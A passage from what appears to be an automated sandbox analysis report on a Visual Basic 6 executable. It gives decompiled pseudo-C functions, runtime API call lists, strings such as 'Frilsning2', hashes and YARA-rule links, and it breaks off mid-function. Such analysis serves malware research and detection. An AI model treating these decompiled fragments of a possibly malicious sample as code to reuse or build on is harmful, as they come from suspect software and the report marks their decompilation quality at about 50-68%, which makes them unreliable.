0x0040c015
0x0040c01a
0x0040c020
0x0040c025
0x0040c02b
0x00000000
0x0040c02b
0x0040be96
0x0040be8d
0x0040bdfc
0x0040bd5f
0x00000000
0x0040bd5f
0x0040bcb7
0x0040c030
0x0040c038
0x0040c03d
0x0040c042
0x0040c045
0x0040c04a
0x0040c050
0x0040c055
0x0040c05b
0x0040c05e
0x0040c05e
0x0040c09c
0x0040c0a1
0x0040c0a1
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040BC42
__vbaStrToAnsi.MSVBVM60(?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC7A
__vbaSetSystemError.MSVBVM60(?,00000000,?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC90
__vbaStrToUnicode.MSVBVM60(004011F6,00000000,?,00000000,?,004011F6,00000000,0002003F,?,?,?,?,?,004011F6), ref: 0040BC9B
#606.MSVBVM60(00000400,00000002), ref: 0040BCD0
__vbaFreeVar.MSVBVM60(00000400,00000002), ref: 0040BCE2
__vbaStrToAnsi.MSVBVM60(?,004011F6,00000400,00000400,00000002), ref: 0040BCF9
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BD0E
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BD22
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BD2D
__vbaStrToUnicode.MSVBVM60(004011F6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6,00000400,00000400,00000002), ref: 0040BD39
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,004011F6,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,004011F6), ref: 0040BD51
__vbaStrCopy.MSVBVM60(004011F6,00000000,?,00000000,?,004011F6,00000000,0002003F,?), ref: 0040C038
__vbaSetSystemError.MSVBVM60(?), ref: 0040C050

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiErrorSystemUnicode$Free$#606ChkstkCopyList
String ID:
API String ID: 1947730533-0
Opcode ID: 39c2ef8567abaed5c18dd2db6cfe1bccc0fbd86503ed2d84fe60b5b1002854ad
Instruction ID: 95dc61da040957dd27b0300b3decbdab18cc4eddf32f57c93a591482654a3e9c
Opcode Fuzzy Hash: 39c2ef8567abaed5c18dd2db6cfe1bccc0fbd86503ed2d84fe60b5b1002854ad
Instruction Fuzzy Hash: 12D1C7B1D00219AAEB10EFE5C846FDEB7B8BF04304F00856AF515B71A1DB389A458F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040E675, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E675(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v108;
				signed int _v112;
				signed int _v116;
				signed int _t47;
				signed int _t51;
				signed int _t57;
				intOrPtr _t78;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t78;
				_push(0x60);
				L004011F0();
				_v12 = _t78;
				_v8 = 0x4011a0;
				L004012D4();
				_v60 = 1;
				_v68 = 2;
				_t47 =  &_v68;
				_push(_t47);
				_push(2);
				_push(L"FGFG");
				L0040128C();
				L0040135E();
				_push(_t47);
				_push(0x40b564);
				L00401292();
				asm("sbb eax, eax");
				_v88 =  ~( ~( ~_t47));
				L00401364();
				L00401352();
				_t51 = _v88;
				if(_t51 != 0) {
					if( *0x4103c4 != 0) {
						_v108 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b5a4);
						L004012E0();
						_v108 = 0x4103c4;
					}
					_v88 =  *_v108;
					_t57 =  *((intOrPtr*)( *_v88 + 0x1c))(_v88,  &_v52);
					asm("fclex");
					_v92 = _t57;
					if(_v92 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40b594);
						_push(_v88);
						_push(_v92);
						L004012EC();
						_v112 = _t57;
					}
					_v96 = _v52;
					_v76 = 0x80020004;
					_v84 = 0xa;
					L004011F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t51 =  *((intOrPtr*)( *_v96 + 0x60))(_v96, L"Frilsning2", 0x10);
					asm("fclex");
					_v100 = _t51;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b5b4);
						_push(_v96);
						_push(_v100);
						L004012EC();
						_v116 = _t51;
					}
					L004012DA();
				}
				_push(E0040E7F9);
				L00401352();
				return _t51;
			}

0x0040e67a
0x0040e685
0x0040e686
0x0040e68d
0x0040e690
0x0040e698
0x0040e69b
0x0040e6a8
0x0040e6ad
0x0040e6b4
0x0040e6bb
0x0040e6be
0x0040e6bf
0x0040e6c1
0x0040e6c6
0x0040e6d0
0x0040e6d5
0x0040e6d6
0x0040e6db
0x0040e6e2
0x0040e6e8
0x0040e6ef
0x0040e6f7
0x0040e6fc
0x0040e702
0x0040e70f
0x0040e729
0x0040e711
0x0040e711
0x0040e716
0x0040e71b
0x0040e720
0x0040e720
0x0040e735
0x0040e744
0x0040e747
0x0040e749
0x0040e750
0x0040e769
0x0040e752
0x0040e752
0x0040e754
0x0040e759
0x0040e75c
0x0040e75f
0x0040e764
0x0040e764
0x0040e770
0x0040e773
0x0040e77a
0x0040e784
0x0040e78e
0x0040e78f
0x0040e790
0x0040e791
0x0040e79f
0x0040e7a2
0x0040e7a4
0x0040e7ab
0x0040e7c4
0x0040e7ad
0x0040e7ad
0x0040e7af
0x0040e7b4
0x0040e7b7
0x0040e7ba
0x0040e7bf
0x0040e7bf
0x0040e7cb
0x0040e7cb
0x0040e7d0
0x0040e7f3
0x0040e7f8

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E690
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E6A8
#631.MSVBVM60(FGFG,00000002,00000002), ref: 0040E6C6
__vbaStrCmp.MSVBVM60(0040B564,00000000,FGFG,00000002,00000002), ref: 0040E6DB
__vbaFreeVar.MSVBVM60(0040B564,00000000,FGFG,00000002,00000002), ref: 0040E6F7
__vbaNew2.MSVBVM60(0040B5A4,004103C4,0040B564,00000000,FGFG,00000002,00000002), ref: 0040E71B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B594,0000001C,?,?,?,?,?,0040B564,00000000,FGFG,00000002,00000002), ref: 0040E75F
__vbaChkstk.MSVBVM60(?,?,?,?,?,0040B564,00000000,FGFG,00000002,00000002), ref: 0040E784
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B5B4,00000060,?,?,?,?,?,0040B564,00000000,FGFG,00000002,00000002), ref: 0040E7BA
__vbaFreeVar.MSVBVM60(0040E7F9,0040B564,00000000,FGFG,00000002,00000002), ref: 0040E7F3

Strings

FGFG, xrefs: 0040E6C1
Frilsning2, xrefs: 0040E792

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresult$#631New2
String ID: FGFG$Frilsning2
API String ID: 1362199501-4153104560
Opcode ID: 0a5761bbadbc66469d54294ba3ee1964861cca9d6bd1ed5d8630c48d65129e31
Instruction ID: 248a07c8f6501c8b768d2e1b7a4bf45af945cf4082c50757bfcda7caa3d99558
Opcode Fuzzy Hash: 0a5761bbadbc66469d54294ba3ee1964861cca9d6bd1ed5d8630c48d65129e31
Instruction Fuzzy Hash: D141F470950218EFDB10EFE5C885BDDBBB5BF08708F20446AE502BB2E1DBB85855CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E5AA, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040E5AA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				short _v84;
				signed short _t21;
				short _t25;
				intOrPtr _t42;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_push(0x44);
				L004011F0();
				_v12 = _t42;
				_v8 = 0x401190;
				L00401322();
				L004012D4();
				L00401322();
				_v56 = 0x20ef;
				_v64 = 2;
				_t21 =  &_v64;
				_push(_t21);
				L0040129E();
				asm("sbb eax, eax");
				_v84 =  ~( ~( ~_t21));
				L00401352();
				_t25 = _v84;
				if(_t25 != 0) {
					_push(0xf5);
					L00401298();
					_v32 = _t25;
				}
				_push(E0040E662);
				L00401364();
				L00401364();
				L00401352();
				return _t25;
			}

0x0040e5af
0x0040e5ba
0x0040e5bb
0x0040e5c2
0x0040e5c5
0x0040e5cd
0x0040e5d0
0x0040e5dd
0x0040e5e8
0x0040e5f3
0x0040e5f8
0x0040e5ff
0x0040e606
0x0040e609
0x0040e60a
0x0040e612
0x0040e618
0x0040e61f
0x0040e624
0x0040e62a
0x0040e62c
0x0040e631
0x0040e636
0x0040e636
0x0040e639
0x0040e64c
0x0040e654
0x0040e65c
0x0040e661

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E5C5
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E5DD
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E5E8
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E5F3
#592.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E60A
__vbaFreeVar.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E61F
#568.MSVBVM60(000000F5,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E631
__vbaFreeVar.MSVBVM60(0040E662,00000002,?,?,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E65C

Strings

, xrefs: 0040E5F8

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CopyFree$#568#592Chkstk
String ID:
API String ID: 3343873478-190826338
Opcode ID: 6ab87d7119cd7a90880bcb9c8ad4f1b63b94586e3f61f6e24b4e80912f857af3
Instruction ID: cf332aee2f7e22eaf0c7b682d90a855725e515f47fde4eb4d82ebdeac7a9196f
Opcode Fuzzy Hash: 6ab87d7119cd7a90880bcb9c8ad4f1b63b94586e3f61f6e24b4e80912f857af3
Instruction Fuzzy Hash: CD114F7080024AAADB04EFA6DC82AEEB778FF14704F50853EF511B75E1EB785905CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEC3, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040AEC3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v96;
				signed int _v100;
				char* _t44;
				signed int _t50;
				intOrPtr _t54;
				void* _t64;
				void* _t66;
				intOrPtr* _t67;

				_a4 = _a4 - 0xffff;
				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L004011F0();
				_v16 = _t67;
				_v12 = 0x401160;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x4c,  *[fs:0x0], 0x4011f6, _t64);
				if( *0x410010 != 0) {
					_v96 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v96 = 0x410010;
				}
				_t54 =  *((intOrPtr*)( *_v96));
				_t44 =  &_v28;
				L004012E6();
				_v80 = _t44;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t67 =  *0x401158;
				_t50 =  *((intOrPtr*)( *_v80 + 0x178))(_v80, _t54, 0x10, 0x10, 0x10, _t44,  *((intOrPtr*)(_t54 + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t50;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b49c);
					_push(_v80);
					_push(_v84);
					L004012EC();
					_v100 = _t50;
				}
				L004012DA();
				asm("wait");
				_push(E0040E395);
				return _t50;
			}

0x0040aec3
0x0040e258
0x0040e267
0x0040e271
0x0040e279
0x0040e27c
0x0040e283
0x0040e292
0x0040e29c
0x0040e2b6
0x0040e29e
0x0040e29e
0x0040e2a3
0x0040e2a8
0x0040e2ad
0x0040e2ad
0x0040e2c7
0x0040e2d1
0x0040e2d5
0x0040e2da
0x0040e2dd
0x0040e2e4
0x0040e2eb
0x0040e2f2
0x0040e2f9
0x0040e300
0x0040e30a
0x0040e314
0x0040e315
0x0040e316
0x0040e317
0x0040e31b
0x0040e325
0x0040e326
0x0040e327
0x0040e328
0x0040e32c
0x0040e336
0x0040e337
0x0040e338
0x0040e339
0x0040e341
0x0040e34c
0x0040e352
0x0040e354
0x0040e35b
0x0040e377
0x0040e35d
0x0040e35d
0x0040e362
0x0040e367
0x0040e36a
0x0040e36d
0x0040e372
0x0040e372
0x0040e37e
0x0040e383
0x0040e384
0x00000000

APIs

__vbaChkstk.MSVBVM60(00000000,004011F6), ref: 0040E271
__vbaNew2.MSVBVM60(0040A880,00410010,?,00000003,?,00000000,004011F6), ref: 0040E2A8
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E2D5
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E30A
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E31B
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040E32C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000178,?,?,00000000), ref: 0040E36D

Strings

=hC, xrefs: 0040E255

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$CheckHresultNew2
String ID: =hC
API String ID: 3535372409-2432917076
Opcode ID: 208a9f1ea8703fb308a800518a5cbdb52a9789e9bcf943829fb96c14a88c761c
Instruction ID: 1e555ed630d02c5ee598a4ef98a9a74e0c968d4d40431ca1f79a788c16b75d71
Opcode Fuzzy Hash: 208a9f1ea8703fb308a800518a5cbdb52a9789e9bcf943829fb96c14a88c761c
Instruction Fuzzy Hash: AF313670940608EBCB11DFD5C849B9EBBB6BF09704F10446AFA00BF2A1C7B95496DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E449, Relevance: 13.6, APIs: 9, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040E449(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v64;
				char _v80;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				char _v128;
				signed int _v132;
				short _v136;
				signed int _v148;
				signed int _v152;
				signed int _t46;
				short _t48;
				signed int _t51;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L004011F0();
				_v16 = _t65;
				_v12 = 0x401180;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t62);
				L004012D4();
				_v104 = 0x40b54c;
				_v112 = 8;
				L004012D4();
				_push( &_v80);
				_t46 =  &_v64;
				_push(_t46);
				L004012AA();
				_v132 = _t46;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(_v132);
					L004012A4();
					_v148 = _t46;
				}
				_v120 = 2;
				_v128 = 0x8002;
				_push( &_v80);
				_t48 =  &_v128;
				_push(_t48);
				L004012B0();
				_v136 = _t48;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401334();
				_t51 = _v136;
				if(_t51 != 0) {
					_t51 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4);
					_v132 = _t51;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40b17c);
						_push(_a4);
						_push(_v132);
						L004012EC();
						_v152 = _t51;
					}
				}
				_push(E0040E57D);
				L00401352();
				return _t51;
			}

0x0040e44c
0x0040e45b
0x0040e467
0x0040e46f
0x0040e472
0x0040e479
0x0040e488
0x0040e491
0x0040e496
0x0040e49d
0x0040e4aa
0x0040e4b2
0x0040e4b3
0x0040e4b6
0x0040e4b7
0x0040e4bc
0x0040e4c3
0x0040e4d5
0x0040e4c5
0x0040e4c5
0x0040e4c8
0x0040e4cd
0x0040e4cd
0x0040e4dc
0x0040e4e3
0x0040e4ed
0x0040e4ee
0x0040e4f1
0x0040e4f2
0x0040e4f7
0x0040e501
0x0040e505
0x0040e506
0x0040e508
0x0040e510
0x0040e519
0x0040e523
0x0040e529
0x0040e530
0x0040e54f
0x0040e532
0x0040e532
0x0040e537
0x0040e53c
0x0040e53f
0x0040e542
0x0040e547
0x0040e547
0x0040e530
0x0040e556
0x0040e577
0x0040e57c

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E467
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E491
__vbaVarDup.MSVBVM60 ref: 0040E4AA
#564.MSVBVM60(?,?), ref: 0040E4B7
__vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?), ref: 0040E4C8
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?), ref: 0040E4F2
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?,?,?,?,?,?), ref: 0040E508
__vbaHresultCheckObj.MSVBVM60(00000000,00401180,0040B17C,0000070C), ref: 0040E542
__vbaFreeVar.MSVBVM60(0040E57D,?,?,004011F6), ref: 0040E577

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#564ChkstkList
String ID:
API String ID: 1402474909-0
Opcode ID: 9f6ce1cdef3fd70677023566b9a0f6be64af4072315fc2f74b5d7c6f42067096
Instruction ID: 5b25c67d4568625c807968257e5f506d061e2f9aaac809571b288de942a87a53
Opcode Fuzzy Hash: 9f6ce1cdef3fd70677023566b9a0f6be64af4072315fc2f74b5d7c6f42067096
Instruction Fuzzy Hash: 3A31E871C00218ABDB10EFA5C845BDDBBB8BF08708F10857AE515BB1A1DB789A15CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA2F, Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040EA2F(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, void* _a12, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _t39;
				signed int _t45;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t61 = _t60 - 0xc;
				 *[fs:0x0] = _t61;
				L004011F0();
				_v16 = _t61;
				_v12 = 0x4011d8;
				_v8 = 0;
				_t39 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x4011f6, _t58);
				L004012D4();
				L00401322();
				_push(0x40b54c);
				L00401286();
				asm("fcomp qword [0x4011d0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x4103c4 != 0) {
						_v76 = 0x4103c4;
					} else {
						_push(0x4103c4);
						_push(0x40b5a4);
						L004012E0();
						_v76 = 0x4103c4;
					}
					_v56 =  *_v76;
					_t45 =  *((intOrPtr*)( *_v56 + 0x48))(_v56, 0x48,  &_v52);
					asm("fclex");
					_v60 = _t45;
					if(_v60 >= 0) {
						_t24 =  &_v80;
						 *_t24 = _v80 & 0x00000000;
						__eflags =  *_t24;
					} else {
						_push(0x48);
						_push(0x40b594);
						_push(_v56);
						_push(_v60);
						L004012EC();
						_v80 = _t45;
					}
					_t39 = _v52;
					_v72 = _t39;
					_v52 = _v52 & 0x00000000;
					L0040135E();
				}
				asm("wait");
				_push(E0040EB40);
				L00401364();
				L00401364();
				L00401352();
				return _t39;
			}

0x0040ea32
0x0040ea41
0x0040ea4b
0x0040ea53
0x0040ea56
0x0040ea5d
0x0040ea6c
0x0040ea75
0x0040ea80
0x0040ea85
0x0040ea8a
0x0040ea8f
0x0040ea95
0x0040ea97
0x0040ea98
0x0040eaa1
0x0040eabb
0x0040eaa3
0x0040eaa3
0x0040eaa8
0x0040eaad
0x0040eab2
0x0040eab2
0x0040eac7
0x0040ead8
0x0040eadb
0x0040eadd
0x0040eae4
0x0040eafd
0x0040eafd
0x0040eafd
0x0040eae6
0x0040eae6
0x0040eae8
0x0040eaed
0x0040eaf0
0x0040eaf3
0x0040eaf8
0x0040eaf8
0x0040eb01
0x0040eb04
0x0040eb07
0x0040eb11
0x0040eb11
0x0040eb16
0x0040eb17
0x0040eb2a
0x0040eb32
0x0040eb3a
0x0040eb3f

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040EA4B
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040EA75
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040EA80
__vbaR8Str.MSVBVM60(0040B54C,?,?,?,?,004011F6), ref: 0040EA8A
__vbaNew2.MSVBVM60(0040B5A4,004103C4,0040B54C,?,?,?,?,004011F6), ref: 0040EAAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B594,00000048), ref: 0040EAF3
__vbaFreeVar.MSVBVM60(0040EB40,0040B54C,?,?,?,?,004011F6), ref: 0040EB3A

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkCopyFreeHresultNew2
String ID:
API String ID: 4022592845-0
Opcode ID: bf420723d8dfd92ea948d5a2452f70820fa8f799025f8399267f35a60a2fa99b
Instruction ID: 51c90d2821f6e5373ff72201fb431c17849809a1b8bf1730a35a6c5fe701bc24
Opcode Fuzzy Hash: bf420723d8dfd92ea948d5a2452f70820fa8f799025f8399267f35a60a2fa99b
Instruction Fuzzy Hash: 4131EA70901209AFDB10EF96D986BDDBBB4FF04708F20846AF501B72E1DB786955CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0040E928, Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0040E928(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28, void* _a36) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v40;
				intOrPtr* _v44;
				signed int _v48;
				intOrPtr* _v56;
				signed int _v60;
				char* _t32;
				signed int _t35;
				intOrPtr _t52;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x28);
				L004011F0();
				_v12 = _t52;
				_v8 = 0x4011c0;
				L00401322();
				L00401322();
				if( *0x410010 != 0) {
					_v56 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v56 = 0x410010;
				}
				_t32 =  &_v40;
				L004012E6();
				_v44 = _t32;
				_t35 =  *((intOrPtr*)( *_v44 + 0x124))(_v44, _t32,  *((intOrPtr*)( *((intOrPtr*)( *_v56)) + 0x320))( *_v56));
				asm("fclex");
				_v48 = _t35;
				if(_v48 >= 0) {
					_v60 = _v60 & 0x00000000;
				} else {
					_push(0x124);
					_push(0x40b4cc);
					_push(_v44);
					_push(_v48);
					L004012EC();
					_v60 = _t35;
				}
				L004012DA();
				asm("wait");
				_push(E0040EA14);
				L00401364();
				L00401364();
				return _t35;
			}

0x0040e92d
0x0040e938
0x0040e939
0x0040e940
0x0040e943
0x0040e94b
0x0040e94e
0x0040e95b
0x0040e966
0x0040e972
0x0040e98c
0x0040e974
0x0040e974
0x0040e979
0x0040e97e
0x0040e983
0x0040e983
0x0040e9a7
0x0040e9ab
0x0040e9b0
0x0040e9bb
0x0040e9c1
0x0040e9c3
0x0040e9ca
0x0040e9e6
0x0040e9cc
0x0040e9cc
0x0040e9d1
0x0040e9d6
0x0040e9d9
0x0040e9dc
0x0040e9e1
0x0040e9e1
0x0040e9ed
0x0040e9f2
0x0040e9f3
0x0040ea06
0x0040ea0e
0x0040ea13

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E943
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E95B
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E966
__vbaNew2.MSVBVM60(0040A880,00410010,?,?,?,?,004011F6), ref: 0040E97E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E9AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B4CC,00000124,?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E9DC

Memory Dump Source

Source File: 00000000.00000002.916869306.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.916860186.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.916916551.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.916929682.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Copy$CheckChkstkHresultNew2
String ID:
API String ID: 2577530999-0
Opcode ID: 27e248d984d4a61e71cd5814c4ece9b8a6f4e513c7fd3fccee4f18291e6fa6b1
Instruction ID: 403d25971d3490dbd09a30ea9d3df56c02ca7fb6595762fae40fede99629db10
Opcode Fuzzy Hash: 27e248d984d4a61e71cd5814c4ece9b8a6f4e513c7fd3fccee4f18291e6fa6b1
Instruction Fuzzy Hash: E421FB70900208AFCB04EF95D986BDEBBB5FB0C718F20446AF101B72E1CBB95955DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040E81A, Relevance: 9.1, APIs: 6, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040E81A(void* __ebx, void* __edi, void* __esi, void* _a28, signed int* _a56) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v80;
				signed int _v84;
				char* _t31;
				signed int _t34;
				void* _t47;
				intOrPtr _t48;

				_t48 = _t47 - 0xc;
				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_push(0x3c);
				L004011F0();
				_v16 = _t48;
				_v12 = 0x4011b0;
				L004012D4();
				 *_a56 =  *_a56 & 0x00000000;
				if( *0x410010 != 0) {
					_v80 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v80 = 0x410010;
				}
				_t31 =  &_v60;
				L004012E6();
				_v64 = _t31;
